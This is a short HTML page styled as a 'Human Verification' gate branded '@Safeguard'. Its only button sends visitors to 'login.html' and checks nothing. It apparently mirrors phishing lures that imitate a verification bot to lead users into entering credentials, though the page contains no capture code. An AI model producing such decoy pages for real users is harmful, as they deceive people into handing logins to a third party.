<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Human Verification</title>
    <style>
        body {
            background-color: #121212;
            color: white;
            text-align: center;
            font-family: Arial, sans-serif;
            margin-top: 50px;
        }
        h1 {
            font-size: 24px;
        }
        p {
            font-size: 16px;
        }
        button {
            background: linear-gradient(45deg, #3b755f, #599474);
            border: none;
            padding: 10px 20px;
            font-size: 18px;
            cursor: pointer;
            border-radius: 5px;
            color: white;
            margin-top: 20px;
        }
        button:hover {
            background: linear-gradient(45deg, #599474, #3b755f);
        }
    </style>
</head>
<body>

    <h1>Human Verification</h1>
    <p>Verify below to be granted entry</p>

    <button onclick="redirectToLogin()">Click Here</button>

    <script>
        function redirectToLogin() {
            window.location.href = "login.html";
        }
    </script>

    <footer style="margin-top: 50px;">
        @Safeguard
    </footer>

</body>
</html>
